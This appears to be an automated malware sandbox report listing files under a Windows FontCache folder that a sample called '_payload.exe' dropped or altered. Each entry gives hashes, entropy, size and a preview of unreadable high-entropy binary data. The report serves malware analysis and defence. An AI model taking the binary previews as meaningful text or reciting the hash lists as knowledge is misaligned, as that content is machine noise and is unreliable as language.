                                                                                                      SHA1:107D534AD519CE7194F96D9EA8788AC1D98BCE8C
                                                                                                      SHA-256:5A4CBDB2DF5F03A0AC9D70F87C7B4E0B48774160C100F76BEAADA0091DA71771
                                                                                                      SHA-512:45F15654EE94E40C433A84A8E546E282EF31D191695542F5D8FC2288C968E9D90BC802C2BE2D9E0C14A24DDC80381553F6C59FF5C332FB7EA696D192FE0F780C
                                                                                                      Malicious:true
                                                                                                      Preview:{.. '...Z,'..)....o...w..+..z..0=....I...A.....K..^.z....uo^...9. R....2.=..4[...%M....P.GC.3...z.F.".......sBttL.OB[...7.0q.T.....!ep...w]<x.O.W..a.g.J....9..".....mb(..Bb^y#l..[..u?....!..8&.uYy....0...Q....D.^.....rE....n.y'....$R....[..6.sGp..n..2.f._:..jHXz..X...bF.....jx.6....s[bwb...I.o.%....c..):...wy....d....z.*X.[E..e..#Npc....r...........7.)..%..|g..'g.2}..V..W.9..Q...V....".u.4...sO..C.n..6.4.Y.1...@..I..$.!.n...n.6[........@.{_....@`w..1.. .j....I.v......Cu..!........g.....B. ..A.4....iOsXt.....4cv..........'`...,`D-..{....Y....z...Td@~..[.Z.............y:..:....../L...g'l-..X....:#...T.(_...[........8...R...D.K=..+...SA|..*.i8..qy..N;........|.m.......,d....K.L...~%Ul......1N...>..9{....).....{p-$.~.h..$~........SQ}Z.P?qd.%D..!B.9.........n.8F2..>|.GJ...xEM{....s..a. ...I..&...g....6.....%..b.SD.Y.J....?|.."..su.-.`9.CM.-.X.J.....m.}9.......&.z.]....w=..k."1.J. .wx....D.G...[.`&&....*...e4..X.^>'/.$...0....A..s..V2.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\3\ListAll.Json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):162608
                                                                                                      Entropy (8bit):7.978040557039432
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:Vz9s9rB9AZ9ltLkAank6V5VR8wz/zlD1rotwcBI7JU:NedB6TltmJV578OD1wwcR
                                                                                                      MD5:0C8C4237F7B269FE7BA72834A247CCE8
                                                                                                      SHA1:E8063DB00A933CA9C2CF3A2D7B8470261F67887B
                                                                                                      SHA-256:83730632A15300EA2AA819A58DBB78037EC27B15A56AB2509527DD41F98520D9
                                                                                                      SHA-512:9B447C6F6939449E25147F38FE77810F3C6F4D51A9EE8D5B6C18F607715061DCDA85855205D7B82B8C574EDAED40A8DB154F567CD348CAFD9E68C638C3220C40
                                                                                                      Malicious:false
                                                                                                      Preview:{"Maj+.B =...\.4[...GI..-R..=./T.S..j..rU.....F.....G....9.*pp...?j%.=.#...@..W....~G.}...O...awG.K,=....-...e,....\..':(v.:.....3.&...6...{..;(......CF.n..p9.NK.........m..e.UI.....la...%..d......[. ...D..a..V..E....Jx^e....f.."...KZ.mVW....).w..F....:.......K....<.......w..d.j0e.m.g.N....%....}).K......#.< ....Y.&.]......'6.%f?.\'..v.[T...6..+*....tq...H.I<"...]...t..&.L.......&.I..T.kbS5.E...a.M....l...."L.*....Z....E...V'...3.$m.....a.3"..n.....o._.n*...`..*W....~u..4..J.Z.....i..x.....8=(K;.,n#..)6...u.8...mC...J..5X.s..{'7.>#.k.y`8`%...!...b\X..\..l..^..d.3..6_K............-...D<..."2......`p..<@.u.v.nP.&.P..1.>Z...|.]..r.....i.{.7.Y?..w...O..47...}.*.!..6.H....\.^B..t..2.S...T.2m./...........Fk.W......[..Q..$..m1...(\....@...N...]..59E.|Q....$..Fe8|m.....l4Kz U.{.o=*B......q..G..2.?U...?....-8wq~..t.....+....k..?.1.3.N ......Z.......-7..V~.1Ol;u.,...X._..k....e...M.#.fW.K.`.4=g19$.;6.U*W_$b.].v%0C@.p...=..j..Ie....X...;..3T)We.c.1..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2203
                                                                                                      Entropy (8bit):7.912818901925949
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:j+Z1EerVETmtTp/90UY6tp2XxP0rKYdmwp9pHp3vtwqawD:j+Z0TmtH0Ip2BP0rzx3lw+
                                                                                                      MD5:781824E420591E1848C9C98E46CFD952
                                                                                                      SHA1:3402F7BC1CFF1240AA4E00BC2C55DA2A9CFC2662
                                                                                                      SHA-256:BEC4154084F5B1D7577BD55EE73955B6800D860ACEDE0196F9C311FDD1583781
                                                                                                      SHA-512:B320FF33EE555130747AB8F14D7E339BC346487FCCD0EE284F4D8F255018C25C4B9DBF4868840A78CF8BB21EE555748EE5E2D4F65BAED9E2843F26FC07286B24
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.1).=.X.T.".J[...{...I..63.x}.!mh.)8.#9.:.....\......B...(.bU7..XiGr..w@.2.m.....;.o'\5...[J8..9.....[.8J...G.r.....z/.....a...i(....[<.di$V...ww...o.#1....1(.u..O.'.0..B|b.2.E..~..?I.........7.C.....\.1d/...O6.Z......?..R.Y..\'/....v.B-.O.+G8/..3...5W.l./....6.Uk.......N..=y(O.....,Iz...LZzif*..YW[.:..X...H.&=....e..9...Y.......R..K'IY.2.caF...u...1.|H.g.qJ..E...AglDB_F.%.......Z.B.....8S4& 6ix|....m...e.6..@O...d..Z2t......r>../......C....=..k..wRf..E....;.....}......}..N..\K....`.dyS.......(.D..OSC(5+.@..Y.py....?.......7.FAT....>8e.........88y.8.W...Q=....\.(_2.Y...%w[..pk....WW.5....:...l."b..{@IF..c.d....(2.\|.s...U}..}..h..l.....V.~.c..h.$1..I%.....mQi.>.."?A.-C.7{.N.U.{6.N...a_F.."xaZ...>..7.!.q1..9.c$.D..Ej(Q.g\...-.I..G.h....%R ..2t....\..Tx..>.C..h...=..k .ul..;......4....U.@h..p`....q..`..6cy...-..... ..0..d..._.0b1.'.A...p......6....S......2.J(0+w..[.N.S......+.y.5-.l...?..........q.<A.w...5.e.N..q..m.X...|...r.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):238254
                                                                                                      Entropy (8bit):7.233766581242505
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:Yr4iy9Bm0jh0lc5xYL7RYS2PCgTHFdUGsrJqAaa/dIDiAb:U4Bjmgh0ljLuPCgvUGsNIDLb
                                                                                                      MD5:8009A98DDCFC3C1E887775D575E3234F
                                                                                                      SHA1:1500D9BD5FA301AB9F19E65767AFF752208493B0
                                                                                                      SHA-256:F1D6AE5D712D5AAE473297F2CF8C84285141D02CD6F584134108271708968137
                                                                                                      SHA-512:02793920DD4A2E20EEE0E64BCBF3D4863E73FEA12FA0540816F52E0FFE6B98B5EEFD570A5259B98565C68EF39562B0787E89EAFFEC5DF09D129C80BFA5761BFC
                                                                                                      Malicious:false
                                                                                                      Preview:.....E....|X...z0.g....[....{..@.Z4...1,...~'..:0..b.^^G.!.P%lG..Am.w..9=.m..G2S.lP.r.!.?wa...m,#..MQ..q....,..|.#B%......lE=v......!.1.w.m.fey0.2....d...0."6......BF..x.RI....8..3T.".f.a.A/...H1.wf1^.h....3...6.:...W(.RF..:N.........#..b.#.PB...0.....r...#+p..o.mnB.........V....qf..-.p.....h.2U..H.\..=.<.ogD...c......=go.i.p~3....e3..y.c...t_.....<..n| ..x.z..2..Pt..\..JL..,.;=Q..`c.+2v...?.....y...V.&........`.Wx..\h.dY.a.oO"../cl(.$D....$...k..v]...b$..Yx.7..<...R..j......7D...i.E..d........p..3......n..JM.....)E....y...zo6N....+.9#Jf....2.....\vA..$+6O..>[`..;...#(......4Q.0Zy.JY.>...j...[..4..>..4uj6....X..!`.......%Q.........\.VQ.'O.~C...]v.L.a...&`..-...,Gl^xV......c..[&.._.dn.z...[...,^[7P.7....l.A....m.A ..&....Y........I.....t.fm.i8.`g.}8PE!......s..Q.{D.O.$.}.~...6=.d..............)G.... E......@...d.].B.+{.~....X...3.S.&..o.-.......D:x....8b...y.r..Z.@....;.........)..3.BNc..A;..........r..9q@F..7sD.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):240882
                                                                                                      Entropy (8bit):7.263364134997996
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:dIBLSkQgSdGDtHA/T4d04Xr2iN/xQYusEpv:dIx6GDtwTU0S2O/aV
                                                                                                      MD5:E77DB8F09AB18DE97321CDB4F6879E57
                                                                                                      SHA1:C3B382B03766693AD94AF543C7B7C679EE20CF95
                                                                                                      SHA-256:0A20446641A94D0534CEE1FD305AFFD61B3D1E5342211CE2EE5BAEE96EA84751
                                                                                                      SHA-512:E78B01B4AF48AB0F35D6C23F87143B6750C38FF327A4D47E0A9BB2E580FCEEF822CD83C736A3D9B052B4A9C5B5CE317640C3B0025D7FF0B2C27DDB7C8E28643E
                                                                                                      Malicious:false
                                                                                                      Preview:.......%.L..k}....n..+.~).n..4...]..X.j.d..3.h..y9..].`.B...9...X9.`."b,.=w...y..9.Z..@..-&..MH/|.......~..z.HL=zx........R........./...y..w4Ic.....>L..........0#$+...xzj...(&.#....P&.m..{...Zhh...S....R?.....".4I.o..w%..*......S/.....lS.....j..0...Y.._.......Xl....;..._jf.\..........M'x.N..@.6S.IN....bZ."....,.J...G..j...]...)...6I....M..TH......]0.[/r......>....,..J...%]=.V..s3.}.%.@.....;3....~!DT..s..4.1m.oU....w...x..t....c"...q..Z...P.....r..49....B.JuN}.d..]..K4..)..p`...@.U.4@k...Z..bh.....V...6J..m..3o.K^,.q.ad?......W2..rY.X.~bt.R...^R..tUb/.o.._$i......O.9.!Y...M.ye......F.U....?..A..,.p..0.X../(N...=..%hl`..`..N>..N..V...v............Ze..8.2....u[`.......O.6.....A#.s._d|0..)...~...;.>,..... 6....uc.s..-._.f.U.NuZ...B.?u.Q..Bd2wc.v....?3.cQs...S....L...l@.|......|./....u.d....*..W...=.[^sN.7...A.C.@......t.%...z.....;..._M.Y.....@..'..M..';]...o>.....6.......6..."k.a...X...R.Sm.D.-P..-.cv.......3.3o....v..&)9....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):241750
                                                                                                      Entropy (8bit):7.259586106838759
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:RttTV+rZVwi+up2DMnEJSPlsbs66ZbDeoG2+chHn2GuYERZ4EsWTqPvnhYbiqncb:Jx+NBl2D0Nso6IXdG2WGOrsWSvq2n
                                                                                                      MD5:718CD915F0E7209E5E0EDCC2F255880C
                                                                                                      SHA1:64082EF96E55B08D4D76296C7AEE92DEB60ACB78
                                                                                                      SHA-256:77FFAD88BD4541FC4F040E86D487990E1CB9444B71875B45527C3FC041AF4C0F
                                                                                                      SHA-512:9E0DF4BB577A482283F7214A43AABD142A10566DE876C251DC35AE09691B2D08D6FA13E2F4F4042EB07A962BC8991A6EBB7BBD4ABD7F2EFEAC201AC6617EEEF1
                                                                                                      Malicious:false
                                                                                                      Preview:.........K.[..Bh........G&..p..x......x.dB].H.t.4.1M.cg...o....4_.....3.".;.3....u...9\V2S..k3.N...F/.....G|.b.?q..$Rs..L/y6n).n~g...?.F..I?..?.<"..L.=P.c....,>.z.{..s..,.?C....1z..c..a...g........:.R.....5h0.....c....!...l3.'F2...q......3.<...._..3..a...p....=s#..R=.;..L.....\...LX.=..XW.8.CK...O.H._.O..._@...=. .l..F_.....W..D}B.y.{..i.KY'..|A.J.I.|E..O.....s'#,...6....u~..].8z.hS.l./....t.......W...D.f#..Xi7..{.,.;,U..$....A......-jMLn.Zx....%].5b.@EO..Bw..&.....p.q.0...[..w'.g.|yNWv..@m..&Y.<yR.C.....Z_.O........7.T.M...]..,....7?%(.D#.qd|C2..\..H.t....=......*.o.PZ...&..>.]u...9.8.c=.../h..+....@_Js...H..`.2.......$..g......E.!...f.^e......Z8.7X.v...O{.......w.RzoT...{!0.a[f.._.......Z...s...].....Y..h.H....)].<.2.....t....J.F...M..ef...x...?.&?..w...4..#f.$.@T.."..% .t.0...........^............#`.t..2...Z./$Z.f...`....G..........1..k...=VT&R.ed.)..z..7..9..:O...u.t...g.Qr....'../.sSX..=.".._g..........2.z..}..U.gy.b.>6E.Q@..M..e

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):238962
                                                                                                      Entropy (8bit):7.234288833597375
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:zxKMPYDd5oivQODxjz2L8/DzuM7PxBvdb/tDpAi:zxKMqdKivpljnDh7rdpqi
                                                                                                      MD5:F99D9F5A742D67E87D9DA552FD7D1F9E
                                                                                                      SHA1:4E06FB57EA376E04AF38A6A3132328640A74FD1D
                                                                                                      SHA-256:ABCB7711819275F2C4AC1BD79DEE85A12C48AD5177CFF10049CC8256F8823746
                                                                                                      SHA-512:4CD876DCDE43914AD87755C3D55E1356A37DAD1A12662675DD5163A6CC4D09F3BF8B2EFA4BA43112F1DBE98C25771C70C516C8DFC82833B287AF6D79CBCEE484
                                                                                                      Malicious:false
                                                                                                      Preview:........T8LG....X..i.}..mR..n............."..-*..C...s. z'z..W.+C..i.?8.....2.....J.Kc-8(8................k.>kCL.R...+..&....../...6|[.."taM.<!.pLa^...s4...v!.N..&.z.>.p. ..L..u...*.......t.`..u....CN.M,.b..B...o..*...=a|.u.c3...7.nhm>.I..$...&....P(...}.?pW.....M.d..t]Q.).5..3N-...t..s{d..d.!.S...M.:...P"B..c.>...@.}~>.]D...V..@.e\.(.{.....s.9p.Y...3..?zl.Q....7Z...].O.K..g ......d3...C{...g0.}./'..=.....6w. ...........0."$iS.d.w.]....vY=..z.4..(/#m.S....e..FZ3..&[....U.O./I.<5.....IrXD...u`......S...;%V.4........-sB.[BmD........X..T"ld...c#M....^.~....u.D.......T>..`v$....3.n).NfM1.apc....t%....x.U......1..9A...$P@.v.w.wD.........:f....[#B..j.Ut..:.z...^.S...&.b..._`..dL..B.TA..W......(......q..{v..aVc..b..`....Bz.W.......B=<F.q.z....[.^D......y..M.].L...>.:...&S...a.I..~..E.(7..nW...$....&k......F.z.l.~....b=..z.....t.b.)....y...........w...6.....e.x...t..yx.......!I...^3.iq..2N.$..u ....w...@xv.HB...*"*..N-. .E.Ux.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):237902
                                                                                                      Entropy (8bit):7.240217351843438
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:VA2Ij8h3JNlbe8XuhHuO+KUSzl0dCJwjysZ1L5VNVsQ9SM4Roc9:mjQ5/K8XQuOh0dCJw5zsuV4ic9
                                                                                                      MD5:01FCB5FA151C13E8DCCE6EB2E4190E59
                                                                                                      SHA1:D23B483A162AA05E10CC84C30C3DE7E10C5C1E4E
                                                                                                      SHA-256:28FB9B9B7960B82719814F6102270B53CE74AACE7555E3BC30EDE75035D31725
                                                                                                      SHA-512:3A194C84518BD4843F7FE9A68988637633D8E1F33967777C7D04BE8B373FD34381ED6A1AB97E11400A5DADB80358C1AB9E162A772881FEE13A8FD024907B8C34
                                                                                                      Malicious:false
                                                                                                      Preview:.....v<...V.jA'.......A..<}.....S.....}r=...>P)..........P:.3^....K...{r...;..Y....9.d2..O..8..F...m.E...~.1....u..g...S....t...7;.+....$DU..Q.......o@...B0kG....c..(%.DA*......L....n..gN.".F.....M0.-.}..UhJ|.7..@pO.1QWK.HZz6s...4j........?.p#).....Q....?.*..r..z.V....pt....R+,..M.U....I...CxR21.6......Y..........D..gf.n...b'.......@;.......H...!2.x.j.........L..x...#.,...;.....X..h{.p>.Z.q.....a^/q7.A....;..q...A....d!+.S...F....(.c5.+.S..'&.A..j.2..........z.8\G.z..z.s....{.N.$xQ...T5..-..,......TF.j..@....K.A...k....M.Q.L.ai'.6.....B..Q.x............z{...<z5...W........N....[..]>..e&~H.8...l...$.L.a-.^s.4..q..#z..A?.....t:.;.3C.+..#..3.R.T.....`.....f.'...QG.....#%.^/..'.Az.SYJ.jzsHXn..n]?. K...gTG].:...........s7.f..`9!..#\\r.iaG.k\O......f5*W..,eK{...v7..1.......N.S:,s..mn...g!.I.-..TA.......z\.....'...~...f..;....lj&..&"......i+....../e&"_.'.[[./.^..Su.T...q....c..M..v.....-,:..!..RK.S.:9.....&....q..F.~...O*..^n3....1..9^|.iA..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):241378
                                                                                                      Entropy (8bit):7.258443360901361
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:OQNeaHqk97T+eAYWfGpTDtIasMOphDtPcwBPt:OnUEDfyhBgJtPcg
                                                                                                      MD5:5F75F7A16DA04E917F814E40300CCE5B
                                                                                                      SHA1:75195141E25C04648B1F6E0EB0D8C5F7C1DF27B5
                                                                                                      SHA-256:B20F3DDB11C299B3977133C4F1D0CACCE885784CD15C8210B9FFD2B44FF91834
                                                                                                      SHA-512:8CE25B7D8208B78ECAFC35EC7751C8756F5483185647895D66FE36A26B8FCECCC9DDE295203158381BBA138D75552ECFEF0A6CA5E1EFD9858AAB92645CD3F2CC
                                                                                                      Malicious:false
                                                                                                      Preview:.......".....0.,\.P..C5P..<].o....-.....WO..z...q/.-...X..t........W=...}t.r...l?j.sl9...R..{.d.B...0=.L....;......s.....c.f..\%..=..p..r3..Q.........Sc...`._...i..........-d...L.q.....!...R;.A.\3g.=.W.Q...J...*.V.w..&..S.}.,.r[ph#pxx..m..`....{}h...6...~.Kv..K...S.X....8..~?Zf.=5...p@TA1..WH)....._.0+.\a.?.F.7;[W.~..:r.......O.^..Bu.*..u...r{.@.*...c.r^...vz..m..Z.1..#.Ep...P.....Q......v..(....o.g7ui.1....a...e0.[a..#.b.L.,1...pb.Z.bp..Hq7s._..9.G......_GB..,.0kxn....Z..zA.h..C....._|/.U..t"..@..^p.Q.3..YP..h.-.d[......~..a.R^....R.(...F....0..N.....q......g.*v.....%.....+.............N...........w7P...j..I.\....^$......&.C......$.|.9X....kR(K.U!.%.11..X.=.'..#:....w%l..8..$.r8.s.j.D..9...5).:Q$.`.y...a....a..p.(&}W...h.\^.c..S..2w.(........W(.ZZY.._3)n.>.oSW).`..4......,)Z.WT...oT.........+&....E...dl.....?.....x.s#.;.0...%..$.....@.w...jSv;H..h...3t..0&..B..u.K.+....,..._.pW.../..o....L.G...g.N..n._.@.....M..fY...,...T..'Y...,...a.C/0.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):237738
                                                                                                      Entropy (8bit):7.237913504224439
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:qYe/e/rTnYpVXh+akD+dXYUV+XbUgWNd+ArFgzIbQY9KTcOwZQaHKemKy1EAsP0P:ReFpVXh+t+doUVObUZdhwOG0QUmdqjcv
                                                                                                      MD5:81E27CBA46B2709C6B947CCA714EA716
                                                                                                      SHA1:73578DC6CF648DB7A172EE51884C305C70D12A67
                                                                                                      SHA-256:03BD138B08406926FC56292441706172C0675D1BB87DD4971A745DB922441373
                                                                                                      SHA-512:4BD07BDC0FF3B2670018A108A3A66C33DBBEB12D6119C92E6DD931FC5DAF0A34DE6A0DADE25A029A764E764ED109B5092A9F56ED66A72E1156F9972EE60AA3FF
                                                                                                      Malicious:false
                                                                                                      Preview:.........D...}..f..s..i.'Ec.m.n.s.......-.4.......N..i][d...9./..<.........Fjja..u..4.....(.y..o.8.../W|."E....x.F.aB...y1rYRX...&.\...0Q'.9.......8....Q..:..qgwM...9'"...R!...p...3.S.\.,..H.>...:B:.4c.T..",eiGxa4..rgi.........{=..\.....:..KG.-..p..w...>.y.j.q6T.J.E.w..s.......'q..rL|<^_...O.t.7.t.i.G4...)....G..#+.}.sT"8...RzK$.zk...6.CB...=0........@..\sJ.@.*...u..........@?/89g........#.+.j%..k.X../ Z...f.Z..|.C..5....:.. k.......&.?.>j.!k....G.Z'Z.....8'.IZ9.......lA.E.F..J...f.i......}dwX...7OSL..6G"......h..dg39...E....K.Ru.:..t.=....aL...2..jURS.d......C..a.(.u.1s~9E..4..].cD......D..{..9$..o..*..6t.Yi...'.W+h.}.......5..W..K.....J....|..u.g...hGx..NU...3...}(..JCp.$....G..|J.x.....[.'....X<4.#......|......1....N..E..W....l\.e....a......BI.#Q.5.4..p...l.@....@~...jHF....Uk?d.MG..[u..]....Z5..~+(wb.E...I....;&..y.:........N..2f....Q...1 .k.U8..A.k..\#.!.....e...i.A.5.....!.l.E>.e....).5....w.r...b..w..]P....._.V!}...t.mJ..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):240706
                                                                                                      Entropy (8bit):7.264049820481835
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:D1W3bgw4raIVgt9GmXbA97kzdBQ6yqU/qa:pGOgDGCbAQyRF
                                                                                                      MD5:DE5469DAA3AA4B34652C9C69369A5BCA
                                                                                                      SHA1:7C121FE7876FD993EE7617B7542D08A4C8C7982A
                                                                                                      SHA-256:75C3F4EF7C2593A4CABF2404C99AAEED7B2D0658267A9FB3C51B526139540E34
                                                                                                      SHA-512:FFF73FEEC37F972E63553904D10ABD526D87B4E636D0259CD1136A223DA339F93EA9F86D09C8AB770AEC6588567BA30C0F39A52517A2C4DC1D156C318684153C
                                                                                                      Malicious:false
                                                                                                      Preview:.............L~.y.\.....:..uU.d..^....;...=(.~....[.].6| ..b6.O......UxN.s.Y.$....Z.x2..yM.......p..L.w.W...*.7...."..>.J....A..\'../y..+.~k...@...].....L. ...'.^.......<.`5".b..<.#.~...X..b..R.#8m..Z;...\.E..*.U.)eY4...w...Q...y.6....x.2.r.#...Z..c*b...M...|.....S..6...wp..>.I. .p.C&o.+.r.......Qw,...GIN......?.*s.Z..2{..io-Y......,@...........L..jB.[h]j....i..B.O`...(.'/;!.Mh.7{R.A.Y...b.$4..ik.......^.G.^......t.<...g..+.ok....e.>....=a.....:N.I.RX....o..7.....LYQ.Z;......)..vw...i.qfu#.G..........q..4...6...l.g..t7_.L....yE.9Fe....)....0.*=....O....!....3O.I.......9B......B.....f...w../.....k\..=e%.Ez.?..DcS..,.......:........E......'..r..?..Ed4{}2P ..L~.<L.8.o3...u.y...tw5F.G..K..%....L...i.9..5...<.z....Q.....Kat..P&X....~.s....H.%...3$|...G..O.)'.x%3....J.*?....C&.EE..@.Pw.n|/.=.|.g....\....9....'.-.1..F6U.w.L...?...i.`.S.......7.1.S...sf....?R... ...d...`H.. .EE.........1....L;..5......dv...k.\C.._.s.....9.'......Co.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):238518
                                                                                                      Entropy (8bit):7.234882459777534
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:HMLSpPJfG0cJDDJqQdP/QfXjiQxvdb/LIAa:HumPJfGFJHOzbd3Va
                                                                                                      MD5:7F37B329A984B1953CCB43D8F9896114
                                                                                                      SHA1:0CD715B1124E93AEA60AB8DF47CB0BDDBE692129
                                                                                                      SHA-256:3C3E95C1B3074C17D7BD6F6F6ADCEF4397F7253FF46700286D351954410C10EE
                                                                                                      SHA-512:7AD565909F210B376785CDCBBCDCB5A4CCFF730B498EDEA2649FEA3A7E0F3A7D034B91A071635CD3E304F00A6EB131A737568756C94298CE2A15EED8BAE2139F
                                                                                                      Malicious:false
                                                                                                      Preview:.....P.....}Ih.f....._..]...l.{Q.J..w."+.....q.H*akE.^..Z:.@Y&.3.h-{1y.'.....D......G\...'..Go.........G.B#<J......su....|b....t...........C..$..c....jN...V'....c..I4.u..L..jkF..W.]0..=..M....G.....A.z..(<.]hM..F./.xF}..}.8]T.....WC..2.7.0.....}.P.~7......l.#F..Yaw..P....F-...#....(E*|N@.h7..M.....j...[..V.4.n.k..Yd..n..M......#P.N.X]....7...R.........&.6ZM...#L..........L={..:...V.<...4q9{..5.^j...=42.z..a?.m\.R7......xM..[.Fg..uu.a....6t..X.H.B=...<.,.w."5.a.....c}........(A6.`..\.W...U..X.+.......BA.xRy.. ...vC7.e.w.d.......>.;w..8.....".|.F....*....v......|c.... ...fl..Z.2dh....%t.......H..I2wH.....p(P.z..9V...8l.......K,...;..!!..8vS....P..c....X....kj.vm7.|g....kMa)4.L..L..q~.y9:G.Gu...m9.....d..T.u..o%..Li..R.Aw...u....".pl.?..LV.....t.Z.B.......7o.x..|........P...9.C.z5...#.....'.....po.6k..p.K...Y.J.....:.V.....,p..-..3.MT/..).D......T. .....'.. ..P.4.V.....[....../C>"......x..%...D..m.%.u..L.....^.gH..'.Dn[..Q.......L2.r......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):241282
                                                                                                      Entropy (8bit):7.260866941123814
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:hl3caBGFw0z/CxSzgo1ZbLmjsHiAe+Vi0p:hl3caKwOiSp9mjsCKl
                                                                                                      MD5:F629AF7DC978B55AADB22A1BEA1CC566
                                                                                                      SHA1:464243B8AE08FBCD0CE227A30509573B25CCC5B4
                                                                                                      SHA-256:BACEE85A01B9A3D08E6F63DDF2EB4506877787095B43572B57C135C159D0C3D9
                                                                                                      SHA-512:CC16BB9AF432D090CB647C5230BF27A0C3AA4C01107667369ED01D02015312F261AE407C3546DD6B069D72B3CF90F9DDD298CE91FD164AF94C96EF73BF464012
                                                                                                      Malicious:false
                                                                                                      Preview:......s.....6$"Y.fq~.'.?....R^{..Z;.....9..zF....F.:U....6.!...kw.*...O..h...C..gd....N.]R. ..o...O...8.F.n)....OV.A.`.........>....~.@.{.......6.....D..0Ni......JWU.n..z..c..].......x.0@.H...5..OGk.U.].3....|...`.5.$( .,'.Z.a...qm....q..&.8..4...to*ft..3.o...1.wea..AD..f..m1....`.e....|...V9y-%..........9.m..1..d<.e........=U...5.c..L"....H.=...N..)..6....@K..(/..C.5.'.....x.)....l.......".....N...~B<.4.b...R>.(...L$s9....P.X.$....T.....|3..`.T.B......H^*U@4.....Ol..A.a.Y......o..yr...)..%....u..}W.:f......-.4.B<.........F%~.JSh..R......2.~.$..].'....b.[..?.*V`.........hSUK...n.3.q.&`.@..KU.>..x..T.$$..N.."GFL.4...L..".%/_$N..D#Bl..<..^..\.z.M...P..J.$~.VdV3Z..+.+.h.LZ.C.ZjY......9.}."VM.]....{b.5:...F.X.,{....-p.!r*.U.a\.].e...&.O..F...>....t.Wa..3&...*G...I......z+.*..%...V<J.,.....q...V.l*)........m.Nb...........i.....#k....t9.i/.e..[V..,J,w4k....._.w....ER....p..2!=..f.\.T.....21..M.....l2..=W..1..h.0.?`t."..u!r..M.{L+ce.....f.Z..L....h....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\29939506207.ttf

